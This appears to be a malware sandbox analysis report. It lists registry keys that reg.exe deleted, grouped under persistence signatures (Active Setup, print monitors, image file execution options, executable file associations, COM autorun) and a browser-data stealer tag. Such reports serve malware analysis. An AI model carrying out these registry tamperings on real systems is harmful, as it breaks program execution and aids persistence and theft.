Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{09CCBE8E-B964-30EF-AE84-6537AB4197F9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5A604D2C-E968-429B-8327-62B5CE52126D} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA855-CC51-11CF-AAFA-00AA00B6015F} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{7C028AF8-F614-47B3-82DA-BA94E41B1089} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{630b1da0-b465-11d1-9948-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{FEBEF00C-046D-438D-8A88-BF94A6C9E703} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{3af36230-a269-11d1-b5bf-0000f8051515} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E92B03AB-B707-11d2-9CBD-0000F87A369E} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{6fab99d0-bab8-11d1-994a-00c04f98bbc9} C:\Windows\system32\reg.exe N/A

Registers new Print Monitor

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Standard TCP/IP Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\WSD Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Local Port C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Microsoft Shared Fax Monitor C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Standard TCP/IP Port\Ports C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor C:\Windows\system32\reg.exe N/A

Sets file execution options in registry

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ois.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenotem.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordconv .exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clview.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfeedssync.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ose.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\selfcert.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msaccess.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoxmled.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstordb.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dw20.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\groove.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ielowutil.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\infopath.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\accicons.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cnfnot32.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onelev.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanost.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanpst.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vpreview.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excelcnv.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie4uinit.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msqry32.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstore.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerpnt.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Winword.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\outlook.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxp.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwtrig20.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenote.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ExtExport.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\graph.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieUnatt.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosync.exe C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setlang.exe C:\Windows\system32\reg.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Compatibility C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046} C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler C:\Windows\system32\reg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6F3DD387-5AF2-492B-BDE2-30FF2F451241}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0074-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E17C-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC9E435A-F037-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8075733B-5146-11D5-A672-00B0D022E945}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E185-0000-0000-C000-000000000046}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F055-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0078-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EE84065-8BA3-4a8a-9542-6EC8B56A3378}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEDE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F069-0000-0000-C000-000000000046}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08F6C820-3CFD-11D1-98BC-006008197D41}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0080-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E957-E47C-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E03AD86-431E-4879-A572-EF0EBA2FA729}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82B02375-B5BC-11CF-810F-00A0C9030074}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{14010e02-bbbd-41f0-88e3-eda371216584}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{044E54C5-B19B-11CE-A689-00AA003F0F07}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0083-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757309-5146-11D5-A672-00B0D022E945}\InprocServer32\14.0.0.0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08F6C81C-3CFD-11D1-98BC-006008197D41}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0078-ABCDEFFEDCBA}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEE2-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBC}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F063-0000-0000-C000-000000000046}\InprocServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{70cba7d2-50a5-4383-8aa5-b378c01c7364}\InProcServer32 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}\InprocServer32 C:\Windows\system32\reg.exe N/A
